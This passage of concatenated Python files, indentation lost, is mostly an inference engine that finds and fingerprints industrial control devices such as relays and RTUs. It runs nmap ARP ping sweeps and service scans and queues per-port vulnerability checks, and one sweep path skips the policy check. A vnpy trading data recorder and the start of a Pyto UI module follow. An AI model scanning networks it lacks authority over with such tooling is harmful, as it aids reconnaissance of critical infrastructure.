self.receiveEvidence(message, "Passive")
#self.receiveQueue.put((message, "Passive"))
def internal_callback(self, topic, message):
printD("InferenceEngine.internal_callback() - ip: {0}, internal callback: {1}, {2}".format(message.get("TARGET_IPADDR", None), topic, message))
self.receiveEvidence(message, "Internal")
#self.receiveQueue.put((message, "Internal"))
def active_callback(self, topic, message):
printD("InferenceEngine.active_callback() - ip: {0}, active callback: {1}, {2}".format(message.get("TARGET_IPADDR", None), topic, message))
mysteryDevice = message["TARGET_IPADDR"]
siteName = self.getSiteName(mysteryDevice)
fromWho = "Active"
if siteName != "NA":
fromWho = fromWho + " ({0})".format(siteName)
if message['SCAN_NAME'] == 'nmap_arp_ping_scan':
printD("PING Got result for nmap_arp_ping_scan")
ipRange = message['TARGET_IPADDR']
self.ipRangeScanStatus[ipRange]["PROCESSING"] = False
self.ipRangeScanStatus[ipRange]["ACTIVE_SCAN_TIME"] = 0
storedDevices = dbManager.allIdentifiers(E_DB_FILE)
# Add IP as separate evidence
scanResult = message['DISCOVERED_TARGETS']
for ip, stats in scanResult.items():
printD("PING: IP:{}, stats: {}".format(ip, stats))
if ip not in storedDevices:
msg = stats
msg['TARGET_IPADDR'] = ip
printD("PING Adding IP to receiveEvidence: IP: {}, msg: {}".format(ip, msg))
self.receiveEvidence(msg, fromWho)
else:
self.DBManager.removeKey(E_DB_FILE, mysteryDevice, "ACTIVE_SCAN_TIME")
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"ACTIVE_SCAN_TIME": ["0"]})
self.receiveEvidence(message, fromWho)
#self.receiveQueue.put((message, fromWho))
#####
#
#####
def getSiteName(self, mysteryDevice):
fr = open("{0}zonemap.json".format(scans_path), "r", encoding="utf-8")
zonemap = json.loads(fr.read())
fr.close()
siteName = "NA"
for key,val in zonemap.items():
# Exact IP match
if mysteryDevice in val:
return key
for key,val in zonemap.items():
# Check if IP in range
for ip in val:
try:
ipObj = ip_address(mysteryDevice)
netObj = ip_network(ip)
if ipObj in netObj:
return key
except Exception as e:
#printD("checking zonemap for ip warning: {0}".format(e))
pass
return "NA"
##########################################################
# vendorMap
##########################################################
def vendorMap(self, vendor):
#printD("InferenceEngine.vendorMap()")
v_names = dbManager.allIdentifiers(V_DB_FILE)
for realVen in v_names:
if helper.singleInList(vendor, dbManager.select(V_DB_FILE, realVen)["VENDOR"]):
vendor = realVen
break
return vendor
##########################################################
# modelMap
##########################################################
def modelMap(self, model):
#printD("InferenceEngine.modelMap()")
d_names = dbManager.allIdentifiers(D_DB_FILE)
for realDev in d_names:
if helper.singleInList(model, dbManager.select(D_DB_FILE, realDev)["MODEL"]):
model = realDev
break
return model
#####
#
#####
def spawnIdentifyProcess(self, mysteryDevice):
resultsDict = {}
resultsDict["device"] = mysteryDevice
printD("spawnIdentifyProcess")
resultsDict = self.IpIdentifier.identifyIP(mysteryDevice, resultsDict, self.rmq_socket)
if resultsDict is not None:
self.identifyIPQueue.put(resultsDict)
#####
#
#####
def identifyProcess(self, mysteryDevice):
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"PROCESSING": ["y"]})
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "PROCESSING", "n")
p = multiprocessing.Process(target=self.spawnIdentifyProcess, args=[mysteryDevice])
p.start()
#####
#
#####
def getFromIPQueue(self):
if not self.identifyIPQueue.empty():
resultsDict = self.identifyIPQueue.get()
mysteryDevice = resultsDict["device"]
for internal in resultsDict["internal"]:
self.receiveEvidence(internal, "Internal")
for external in resultsDict["external"]:
printD("publishing ip: {0}, external: {1}".format(mysteryDevice, external))
#self.publishActor.publish_request(external["ACTIVE_REQUEST_STRING"], external["SCAN"])
self.publish_messages.append((external["ACTIVE_REQUEST_STRING"], external["SCAN"]))
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"PROCESSING": ["n"]})
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "PROCESSING", "y")
##########################################################
# startNmapScan:
##########################################################
def startNmapScan(self, device, ports):
prevStatus = {}
prevStatus["device"] = device
prevStatus["port"] = ports
prevStatus["nmap"] = 'yes'
p = multiprocessing.Process(target=self.spawnProcessServiceForNmap, args=(device,ports, prevStatus))
p.start()
def spawnProcessServiceForNmap(self, device, ports, prevStatus):
printD("SN: spawnProcessServiceForNmap: {}, {}, {}".format(device, ports, prevStatus))
currentStatus = self.ServiceProcessor.processNmap(device, ports, prevStatus, self.rmq_socket)
# Put currentStatus in the multiprocess queue
self.identifyVulnQueue.put(currentStatus)
##########################################################
# identifyVulnerability:
##########################################################
def identifyVulnerability(self, device, port, service):
self.DBManager.insert(E_DB_FILE, device, {"PROCESSING": ["y"]})
self.DBManager.removeVal(E_DB_FILE, device, "PROCESSING", "n")
prevStatus = {}
identified = 'n'
for ip_port in dbManager.select(S_DB_FILE, "VULN_IDENTIFIED").get("IP_PORT", []):
ip, pt = ip_port.split('_')
if ip == device and port == pt:
identified = 'y'
break
prevStatus['device'] = device
prevStatus['port'] = port
prevStatus['identified'] = identified
prevStatus['nmap'] = 'done'
p = multiprocessing.Process(target=self.spawnProcessService, args=(device,port,service,prevStatus))
p.start()
def spawnProcessService(self, device, port, service, prevStatus):
currentStatus = None
currentStatus = self.ServiceProcessor.processService(device, port, service, prevStatus, self.rmq_socket)
# Put currentStatus in the multiprocess queue
if currentStatus is not None:
self.identifyVulnQueue.put(currentStatus)
##########################################################
# getFromVulnQueue: Get results from process queue and store it locally
##########################################################
def getFromVulnQueue(self):
if not self.identifyVulnQueue.empty():
resultsDict = self.identifyVulnQueue.get()
mysteryDevice = resultsDict["device"]
for internal in resultsDict["internal"]:
self.receiveEvidence(internal, "Internal")
for external in resultsDict["external"]:
printD("publishing ip: {0}, external: {1}".format(mysteryDevice, external))
#self.publishActor.publish_request(external["ACTIVE_REQUEST_STRING"], external["SCAN"])
self.publish_messages.append((external["ACTIVE_REQUEST_STRING"], external["SCAN"]))
port = resultsDict["port"]
identified = 'n'
if "identified" in resultsDict.keys():
identified = resultsDict["identified"]
if identified == 'y':
ip_port = "{}_{}".format(mysteryDevice, port)
self.DBManager.insert(S_DB_FILE, "VULN_IDENTIFIED", {"IP_PORT": [ip_port]})
self.DBManager.insert(E_DB_FILE, mysteryDevice, {"PROCESSING": ["n"]})
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "PROCESSING", "y")
vulnProtocols = self.getVulnerabilityPorts(mysteryDevice)
printD("SN: ***IdentifiedVulnerabilities device: {}, ports: {}".format(mysteryDevice, vulnProtocols))
#printD("Identified Vulnerabilities: {}".format(self.identifiedVulnerabilities))
##########################################################
# geventLoop()
##########################################################
def geventLoop(self):
printD("InferenceEngine.geventLoop()")
while not self.connection_ready:
time.sleep(0.01)
self.publish_message("inference.start", {})
peekScanTime = time.time()
while True:
time.sleep(0.01)
# print out debug info
printD("inference.geventLoop() - identified: {0}".format(dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", [])))
########## DEVICE IDENTIFICATION ##########
self.processIdentification()
########## SERVICE PROCESSING / VULNERABILITY ##########
self.processVulnerabilities()
########## GET FROM MULTIPROCESSING IP QUEUE ##########
self.getFromIPQueue()
########## GET FROM MULTIPROCESSING VULNERABILITY QUEUE ##########
self.getFromVulnQueue()
userInput = self.checkForPingSweepUserInput()
if userInput:
printD("PING: Sending ping sweep: {}".format(userInput))
self.ping_sweep_handler(userInput)
currentTime = time.time()
if currentTime - peekScanTime >= 30:
printD("PING: Checking for ExternalIPs")
devices = self.checkForExternalIPs()
printD("PING: Device list from checkForExternalIPs: {}".format(devices))
peekScanTime = currentTime
# Should be from frontend, but for testing purposes
# ipRangeList = ['172.17.0.0/28']
# self.ping_sweep_handler(ipRangeList)
if len(devices) > 0:
requestTimeStamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S%f")
requestDict = {}
requestDict["MESSAGE"] = ["PING: Device list from checkForExternalIPs: {}".format(devices)]
self.DBManager.insert(R_DB_FILE, requestTimeStamp, requestDict)
##########################################################
# processIdentification()
##########################################################
def processIdentification(self):
printD("inference.geventLoop() - ID_QUEUE: {0}".format(dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", [])))
if not self.newPortEvidenceQueue.empty():
printD("inference.geventLoop() - VULN_QUEUE: {0}".format(self.newPortEvidenceQueue.peek()))
########## IDENTIFICATION ###########
# Go through evidenceIP queue, find IP that has new evidence waiting
# remove from list
mysteryDevice = False
for mD in dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", []):
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if self.ipInPolicy(mD) and (("PROCESSING" not in mysteryEvidence.keys()) or ("PROCESSING" in mysteryEvidence.keys() and "n" in mysteryEvidence["PROCESSING"] and "y" not in mysteryEvidence["PROCESSING"])):
mysteryDevice = mD
break
# If no new evidence, go through IPs currently in an active scan
# (so we can see if timeout has passed)
if mysteryDevice == False:
devices = dbManager.allIdentifiers(E_DB_FILE)
for mD in devices:
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if self.ipInPolicy(mD) and "ACTIVE_SCAN_TIME" in mysteryEvidence.keys() and "0" not in mysteryEvidence["ACTIVE_SCAN_TIME"] and mysteryDevice not in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []):
mysteryDevice = mD
break
# run identification process on the chosen IP (mysteryDevice)
if mysteryDevice != False:
if mysteryDevice not in dbManager.select(S_DB_FILE, "DECK").get("IP", []):
self.DBManager.removeVal(S_DB_FILE, "ID_QUEUE", "IP", mysteryDevice)
else:
self.DBManager.removeVal(S_DB_FILE, "DECK", "IP", mysteryDevice)
printD("identifyProcess")
self.identifyProcess(mysteryDevice)
#####
#
#####
def checkForExternalIPs(self):
externalDevices = []
devices = dbManager.allIdentifiers(E_DB_FILE)
for device in devices:
ipAddr = ip_address(device)
ipNetwk = ip_network(self.internal_range)
if ipAddr not in ipNetwk and ipAddr not in self.ping_sweep_processed:
printD("PING: ipAddr: {0} not in ipNetwk: {1}".format(ipAddr, ipNetwk))
self.ping_sweep_processed.add(ipAddr)
externalDevices.append(device)
return externalDevices
def checkForPingSweepUserInput(self):
allRequestTimeStamps = dbManager.allIdentifiers(R_DB_FILE)
for requestTimeStamp in allRequestTimeStamps:
requestDict = dbManager.select(R_DB_FILE, requestTimeStamp)
if "DONE" not in requestDict and "PINGSWEEP" in requestDict:
printD("geventLoop() Ping sweep timestamp: {0}, response: {1}".format(requestTimeStamp, requestDict["PINGSWEEP"]))
self.DBManager.insert(R_DB_FILE, requestTimeStamp, {"DONE": ["Y"]})
return requestDict["PINGSWEEP"]
return None
def ping_sweep_handler(self, ipRangeList):
#targetPorts = '21-23,80,443,502,20000'
for ipRange in ipRangeList:
# Check if input format is correct
runScan = True
if ipRange in self.ipRangeScanStatus.keys() and "PROCESSING" in self.ipRangeScanStatus[ipRange].keys():
                timeElapsed = time.time() - self.ipRangeScanStatus[ipRange]["ACTIVE_SCAN_TIME"]
                # Scan is still in progress and the maximum wait has not elapsed.
if timeElapsed < 100:
runScan = False
if runScan == True:
# Get scan parameters
categoryName = "network_scan"
scan = self.IpIdentifier.getScanWithoutPolicyCheck("nmap_arp_ping_scan", ipRange, {})
printD("PING: Scan parameters for nmap_arp_ping_scan: {}".format(scan))
if scan == "NA":
return scan
scan["PARAMS"]["SCAN_NAME"] = "nmap_arp_ping_scan"
scan["PARAMS"]["TARGET_IPADDR"] = ipRange
# scan["TARGET_PORTS"] = targetPorts
if ipRange not in self.ipRangeScanStatus.keys():
self.ipRangeScanStatus[ipRange] = dict()
self.ipRangeScanStatus["PROCESSING"] = True
self.ipRangeScanStatus["ACTIVE_SCAN_TIME"] = time.time()
# siteName from zonemap, which came from user
siteName = self.getSiteName(ipRange)
# Kick off new ping sweep scan
if siteName != "NA":
printD("PING: Sending requestScan: ipRange: {}, scan: {} and siteName: {}".format(ipRange, scan, siteName))
# self.IpIdentifier.requestScan(ipRange, scan, siteName)
# TODO add ping sweep status/history to webpage somehow
# self.publish_request("active.requests.{0}".format(siteName), scan["PARAMS"])
self.publish_messages.append(("active.requests.{0}".format(siteName), scan["PARAMS"]))
def processVulnerabilities(self):
###################################################################
# If the device has been identified, then newPortEvidenceQueue will
# not be empty because it will be ready to process the ports and
# services it supports to check for vulnerabilities.
###################################################################
mysteryDevice = False
port = 0
service = 0
IP_PORT_SERVICE = None
ips = dbManager.select(S_DB_FILE, "VULN_QUEUE").get("IP_PORT_SERVICE", [])
printD( "VULN_QUEUE len: {}, entries: {}".format(len(ips), ips))
for ip_port_service in dbManager.select(S_DB_FILE, "VULN_QUEUE").get("IP_PORT_SERVICE", []):
printD("SN: Retrieving from VULN_QUEUE db {}".format(ip_port_service))
mD, port, service = ip_port_service.split('|')
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if ("PROCESSING" not in mysteryEvidence.keys()) or ("PROCESSING" in mysteryEvidence.keys() and "n" in mysteryEvidence["PROCESSING"] and "y" not in mysteryEvidence["PROCESSING"]):
mysteryDevice = mD
IP_PORT_SERVICE = ip_port_service
break
# If no new evidence, go through IPs currently in an active scan
# (so we can see if timeout has passed)
if mysteryDevice == False:
devices = dbManager.allIdentifiers(E_DB_FILE)
for mD in devices:
mysteryEvidence = dbManager.select(E_DB_FILE, mD)
if "ACTIVE_SCAN_TIME" in mysteryEvidence.keys() and "0" not in mysteryEvidence["ACTIVE_SCAN_TIME"] and "nmap_service_scan" in dbManager.select(E_DB_FILE, mD).get("SCAN_NAME", []):
#mysteryDevice = mD
protocols = self.getProtocols(mD)
# Check if port done with vulnerabilities check
try:
                        vulnProtocols = self.getVulnerabilityPorts(mD)
                        keys_to_delete = []
                        for k, p in protocols.items():
                            if p in vulnProtocols:
keys_to_delete.append(k)
for k in keys_to_delete:
del protocols[k]
except KeyError:
pass
for p, s in protocols.items():
port = p
service = s
break
                    if port != 0 and service != 0:
mysteryDevice = mD
break
# run identify vulnerability process on the chosen IP (mysteryDevice), PORT and SERVICE
if mysteryDevice != False:
printD("SN: Found ip port to scan: IP: {}, PORT: {}, SERVICE: {}, IP_PORT_SERVICE: {}".format(mysteryDevice, port, service, IP_PORT_SERVICE))
if IP_PORT_SERVICE is None:
IP_PORT_SERVICE = "{}|{}|{}".format(mysteryDevice, port, service)
self.DBManager.removeVal(S_DB_FILE, "VULN_QUEUE", "IP_PORT_SERVICE", IP_PORT_SERVICE)
self.identifyVulnerability(mysteryDevice, port, service)
##########################################################
# Get Ports from evidence, vendor profile and device profile
##########################################################
def getProtocols(self, mysteryDevice):
mysteryEvidence = dbManager.select(E_DB_FILE, mysteryDevice)
#printD("getPorts: {}".format(mysteryEvidence))
vendor = mysteryEvidence.get('VENDOR', None)
#if vendor is None or vendor[0].upper() not in ['SEL', 'GE']:
# printD("getPorts for {} returning since vendor is not SEL:{}".format(mysteryDevice, vendor))
# return {}
model = mysteryEvidence.get('MODEL', None)
protocols = {}
# Check for ports info in the evidence
if "PROTOCOLS" in mysteryEvidence:
for scada_protocol in mysteryEvidence["PROTOCOLS"]:
if "{0}_PORT".format(scada_protocol) in mysteryEvidence:
protocols[scada_protocol] = mysteryEvidence["{0}_PORT".format(scada_protocol)]
if vendor is not None:
v = self.vendorMap(vendor[0]).upper()
printD("SN: VENDORMAP: INPUT: {}, MAPPED: {}".format(vendor[0], v))
# Read from vendor profile
vendorPath = "{0}/{1}.json".format(vendor_profiles_path, v)
protocols = self.getProtocolsFromProfile(vendorPath)
if model is not None:
m = self.modelMap(model[0]).upper()
printD("SN: MODELMAP: INPUT: {}, MAPPED: {}".format(model[0], m))
# Read from device profile
if m.upper() == "CONTROLWAVEREMOTEIO":
m = "ControlWaveRemoteIO"
modelPath = "{0}/{1}.json".format(device_profiles_path, m)
modelProtocols = self.getProtocolsFromProfile(modelPath)
protocols.update(modelProtocols)
return protocols
##########
#
##########
def getProtocolsFromProfile(self, profilePath):
try:
fr = open(profilePath, "r", encoding="utf-8")
profileConfig = json.loads(fr.read())
fr.close()
except IOError as e:
printD("ERROR Cannot open file: {}".format(e))
return {}
protocols = {}
printD("profile Config: {}".format(profileConfig))
services = profileConfig.get("SERVICES", {})
scada = profileConfig.get("SCADA", {})
services.update(scada)
for service, prts in services.items():
printD("service: {}, ports: {}".format(service, prts))
try:
service_key = service + "_TCP"
protocols[service_key] = prts["TCP"][0]
except (KeyError, IndexError):
pass
try:
service_key = service + "_UDP"
protocols[service_key] = prts["UDP"][0]
except (KeyError, IndexError):
pass
printD("getFromProfile: {}".format(protocols))
return protocols
#####
#
#####
def processSignature(self, signature, ttl):
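        # Match the observed TCP signature and TTL against the stored device
        # profiles; when every match agrees on a device type, return partial
        # evidence (vendor / device type) for that type.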
partialEvidence = {}
relays = []
rtus = []
d_devices = dbManager.allIdentifiers(D_DB_FILE)
for device in d_devices:
profile = dbManager.select(D_DB_FILE, device)
device_type = profile.get("DEVICE_TYPE", None)
if device_type is not None:
if "TCP_SIG" in profile.keys() and "TTL" in profile.keys():
if helper.singleInList(signature, profile["TCP_SIG"]) and helper.singleInList(ttl, profile["TTL"]):
if device_type[0] == "relay":
relays.append(profile)
elif device_type[0] == "rtu":
rtus.append(profile)
if len(relays) == 0 and len(rtus) > 0:
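            # The trailing "and False" below (and in the relays branch) keeps
            # the single-match MODEL shortcut disabled, so only VENDOR and
            # DEVICE_TYPE are inferred from the signature.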
if len(rtus) == 1 and "MODEL" in rtus[0].keys() and False:
partialEvidence["MODEL"] = rtus[0]["MODEL"][0]
if "VENDOR" in rtus[0].keys():
partialEvidence["VENDOR"] = rtus[0]["VENDOR"][0]
partialEvidence["DEVICE_TYPE"] = "rtu"
elif len(rtus) == 0 and len(relays) > 0:
if len(relays) == 1 and "MODEL" in relays[0].keys() and False:
partialEvidence["MODEL"] = relays[0]["MODEL"][0]
if "VENDOR" in relays[0].keys():
partialEvidence["VENDOR"] = relays[0]["VENDOR"][0]
partialEvidence["DEVICE_TYPE"] = "relay"
printD("inference.processSignature() - partialEvidence: {0}".format(partialEvidence))
return partialEvidence
#####
#
#####
def ipInPolicy(self, mysteryDevice):
fr = open("{0}policy.json".format(scans_path), "r", encoding="utf-8")
policy = json.loads(fr.read())
fr.close()
if mysteryDevice in policy.keys():
return True
else:
for key in policy.keys():
if key != "default":
try:
ipObj = ip_address(mysteryDevice)
netObj = ip_network(key)
                        if ipObj in netObj:
                            return True
except Exception as e:
#printD("checking policy for ip warning: {0}".format(e))
pass
printD("ipInPolicy() - ip: {0} not in policy".format(mysteryDevice))
return False
##########################################################
# receiveEvidence(evidence)
# get all existing evidence for this IP from DB
# determine which recent evidence is NEW
# add new evidence to DB (as is, no sanitize)
# if IP not in queue, add it
##########################################################
def receiveEvidence(self, rawEvidence, fromWho = ""):
# get mysteryDevice (IP)
if "TARGET_IPADDR" not in rawEvidence.keys():
return False
mysteryDevice = rawEvidence["TARGET_IPADDR"]
rawEvidence = helper.breakDownDict(rawEvidence, "", {})
#if mysteryDevice == "172.17.0.13" and "SCAN_NAME" in rawEvidence.keys() and "http_TCP_header_probe" == rawEvidence["SCAN_NAME"]:
# printD("Returning 172.17.0.13 header probe")
# return False
existingEvidence = {}
newEvidence = {}
# first occurence of device
e_devices = dbManager.allIdentifiers(E_DB_FILE)
if mysteryDevice not in e_devices:
printD("receive() - ip: {0}, FIRST".format(mysteryDevice))
rawEvidence["PROCESSING"] = "n"
rawEvidence["ACTIVE_SCAN_TIME"] = "0"
else:
existingEvidence = dbManager.select(E_DB_FILE, mysteryDevice)
for rawKey,rawVal in rawEvidence.items():
rawKey = str(rawKey).strip()
if isinstance(rawVal, string_type) or isinstance(rawVal, int) or isinstance(rawVal, float):
rawVal = str(rawVal).strip()
pass
else:
# handle eventually
continue
# ignore
if rawKey in ["DEST_PORT", "SOURCE_PORT", "CTR"] or rawKey.startswith("STATUS") or len(rawVal) < 1 or helper.compareSingle(rawVal, "none"):
continue
# conversions
if rawKey == "PROTOCOL":
rawKey = "PROTOCOLS"
# vendor mapping
if rawKey == "VENDOR":
oldVal = rawVal
rawVal = self.vendorMap(rawVal)
printD("receiveEvidence - ip: {0}, rawVendor: {1}, vendorMap: {2}".format(mysteryDevice, oldVal, rawVal))
# model mapping
modelKeys = ["MODEL", "PART_NO", "DEVICE_NAME"]
if rawKey in modelKeys:
oldVal = rawVal
if "MODEL" not in newEvidence.keys():
newEvidence["MODEL"] = []
rawVal = self.modelMap(rawVal)
newEvidence["MODEL"].append(rawVal)
printD("receiveEvidence - ip: {0}, rawModel: {1}, modelMap: {2}".format(mysteryDevice, oldVal, rawVal))
# signature processing
if rawKey == "TCP_SIG" and "TTL" in rawEvidence.keys():
partialEvidence = self.processSignature(rawVal, rawEvidence["TTL"])
for partialKey,partialVal in partialEvidence.items():
if partialKey not in newEvidence.keys():
newEvidence[partialKey] = []
newEvidence[partialKey].append(partialVal)
# new key
if rawKey not in existingEvidence.keys():
if rawKey not in newEvidence.keys():
newEvidence[rawKey] = []
if rawVal not in newEvidence[rawKey]:
newEvidence[rawKey].append(rawVal)
# existing key, new val
elif not helper.singleInList(rawVal, existingEvidence[rawKey]):
if rawKey not in newEvidence.keys():
newEvidence[rawKey] = []
if rawVal not in newEvidence[rawKey]:
newEvidence[rawKey].append(rawVal)
if len(newEvidence.keys()) > 0:
printD("receive() - ip: {0}, EXISTING: {1}, NEW: {2}".format(mysteryDevice, existingEvidence, newEvidence))
# add event to events DB - only for passive/active
if "Passive" in fromWho or "Active" in fromWho:
eventTimestamp = datetime.datetime.now().strftime("%Y%m%d%H%M%S%f")
event = {}
event["TYPE"] = ["IDENTIFICATION"]
event["TARGET_IPADDR"] = [mysteryDevice]
if "Passive" in fromWho:
event["SIGNATURE"] = ["Passive"]
if "PROTOCOL" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["PROTOCOL"]]
elif "PROTOCOLS" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["PROTOCOLS"]]
elif "SERVICE" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["SERVICE"]]
event["STATUS"] = ["New Evidence"]
elif "Active" in fromWho:
event["SIGNATURE"] = ["Active"]
if "SCAN_NAME" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["SCAN_NAME"]]
fr = open("{0}scans.json".format(scans_path), "r", encoding="utf-8")
scansDict = json.loads(fr.read())
fr.close()
scanDict = helper.getNested(scansDict, rawEvidence["SCAN_NAME"])
if mysteryDevice in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []) and scanDict != False and helper.singleInList("vulnerability", scanDict.get("TYPE", [])):
event["TYPE"] = ["VULNERABILITY"]
event["STATUS"] = ["Results Received"]
event["INFO"] = [json.dumps(newEvidence)]
self.DBManager.insert(EVENTS_DB_FILE, eventTimestamp, event)
printD("inference inserting new evidence for ip {0}".format(mysteryDevice))
# insert new evidence into DB (as is, not sanitized)
self.DBManager.insert(E_DB_FILE, mysteryDevice, newEvidence)
# check if NA vendor needs to be removed
if "VENDOR" in newEvidence.keys() and "NA" not in newEvidence["VENDOR"]:
if "VENDOR" in existingEvidence.keys() and "NA" in existingEvidence["VENDOR"]:
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "VENDOR", "NA")
# check if identified
if "MODEL" in newEvidence.keys():
self.DBManager.insert(S_DB_FILE, "IDENTIFIED", {"IP": [mysteryDevice]})
self.DBManager.removeVal(S_DB_FILE, "ID_QUEUE", "IP", mysteryDevice)
self.DBManager.removeVal(S_DB_FILE, "DECK", "IP", mysteryDevice)
deviceProfile = dbManager.select(D_DB_FILE, newEvidence["MODEL"][0])
if "DEVICE_TYPE" in deviceProfile.keys():
newEvidence["DEVICE_TYPE"] = deviceProfile["DEVICE_TYPE"]
self.DBManager.insert(E_DB_FILE, mysteryDevice, newEvidence)
# add IP to queue to be processed
printD("receive before() - ID_QUEUE: {0}".format(dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", [])))
if mysteryDevice not in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []):
self.DBManager.insert(S_DB_FILE, "DECK", {"IP": [mysteryDevice]})
self.DBManager.insert(S_DB_FILE, "ID_QUEUE", {"IP": [mysteryDevice]})
printD("receive after() - ID_QUEUE: {0}".format(dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", [])))
scan = {}
scan["PARAMS"] = {"key": "testing"}
# self.publish_request("active.requests.pacific", scan["PARAMS"])
# prepare the vulnerability queue
if mysteryDevice in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []):
printD("SN: New evidence: {}".format(newEvidence))
printD("SN: Device is identified: {}".format(mysteryDevice))
if mysteryDevice not in self.ServiceProcessor.processStarted.keys():
self.ServiceProcessor.serviceInfo[mysteryDevice] = protocols = self.getProtocols(mysteryDevice)
# Kick off nmap scan
pts = []
for service, port in protocols.items():
pts.append(port)
printD("SN: starting Nmap Scan for mystery device: {}, ports: {}".format(mysteryDevice, pts))
self.startNmapScan(mysteryDevice, pts)
self.ServiceProcessor.processStarted[mysteryDevice] = True
# check whether the "nmap_service_scan" results have come back
scanName = "nmap_service_scan"
if scanName in dbManager.select(E_DB_FILE, mysteryDevice).get("SCAN_NAME", []):
printD("SN: nmap_service_scan received. mysteryDevice: {}, new evidence: {}".format(mysteryDevice, newEvidence))
# Determine which ports have already completed vulnerability scanning
try:
# printD("SN: IdentifiedVulnerabilities ports: {}".format(self.identifiedVulnerabilities))
protocols = self.ServiceProcessor.serviceInfo[mysteryDevice]
vulnProtocols = self.getVulnerabilityPorts(mysteryDevice)
printD("SN: IdentifiedVulnerabilities device: {}, ports: {}".format(mysteryDevice, vulnProtocols))
keys_to_delete = []
for k, p in protocols.items():
if p in vulnProtocols:
printD("SN: Port {} on Device: {} is vulnerability scanned.".format(p, mysteryDevice))
keys_to_delete.append(k)
for k in keys_to_delete:
del protocols[k]
except KeyError:
# no service info recorded yet for this device; leave nothing to queue
protocols = {}
for service, port in protocols.items():
ip_port_service = "{}|{}|{}".format(mysteryDevice, port, service)
#self.newPortEvidenceQueue.put(mysteryDevice, port, service)
entries = dbManager.select(S_DB_FILE, "VULN_QUEUE").get("IP_PORT_SERVICE", [])
printD("SN: db entries: {}, ip_port_service: {}".format(entries, ip_port_service))
if ip_port_service not in entries:
self.DBManager.insert(S_DB_FILE, "VULN_QUEUE", {"IP_PORT_SERVICE": [ip_port_service]})
printD("SN: ip_port_service: {}".format(ip_port_service))
#printD("SN: AFTER putting newPortEvidenceQueue: {}".format(self.newPortEvidenceQueue))
printD("inference.receive() - exiting")
def getVulnerabilityPorts(self, mysteryDevice):
vulnProtocols = set()
ip_ports = dbManager.select(S_DB_FILE, "VULN_IDENTIFIED").get("IP_PORT", [])
for ip_port in ip_ports:
ip, port = ip_port.split('_')
if ip == mysteryDevice:
vulnProtocols.add(port)
return vulnProtocols
|
runDataRecording.py
|
# encoding: UTF-8
from __future__ import print_function
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
Handle error events.
After each login, all error messages generated that day are pushed again, so they are not suitable for writing to the log.
"""
error = event.dict_['data']
print(u'Error code: %s, error message: %s' % (error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""Child process entry point."""
print('-'*20)
# Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'Starting market data recording child process')
ee = EventEngine2()
le.info(u'Event engine created successfully')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(dataRecorder)
le.info(u'Main engine created successfully')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'Registered log and error event listeners')
me.connect('CTP')
le.info(u'Connecting to the CTP gateway')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""Parent (daemon) process entry point."""
# Create the log engine
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'Starting market data recording daemon (parent process)')
DAY_START = time(8, 57) # day session start and stop times
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # night session start and stop times
NIGHT_END = time(2, 33)
p = None # child process handle
while True:
currentTime = datetime.now().time()
recording = False
# Determine which trading session the current time falls into
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# Filter out the weekend: all day Sunday, Saturday after the Friday night session ends, and Monday before the day session starts
if ((datetime.today().weekday() == 6) or
(datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
(datetime.today().weekday() == 0 and currentTime < DAY_START)):
recording = False
# During recording hours, make sure the child process is running
if recording and p is None:
le.info(u'Starting child process')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'Child process started successfully')
# Outside recording hours, shut the child process down
if not recording and p is not None:
le.info(u'Stopping child process')
p.terminate()
p.join()
p = None
le.info(u'Child process stopped successfully')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
pyto_ui.py
|
"""
UI for scripts
The ``pyto_ui`` module contains classes for building and presenting a native UI, in app or in the Today Widget.
This library's API is very similar to UIKit.
.. warning::
This library requires iOS / iPadOS 13.
This library has a lot in common with ``UIKit``, but subclassing isn't supported very well. Instead of overriding methods, you will often set a property to a function. For properties, the setter is what makes the passed value take effect, so instead of overriding a getter you should just set the property. If you really want to subclass a :class:`View`, you can set those properties from the initializer (see the example below).
(Many docstrings are quoted from the Apple Documentation)
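Example (a minimal sketch of this pattern; ``Button`` and ``show_view`` are defined later in this module, and the button's ``title`` and ``action`` properties are assumed here):
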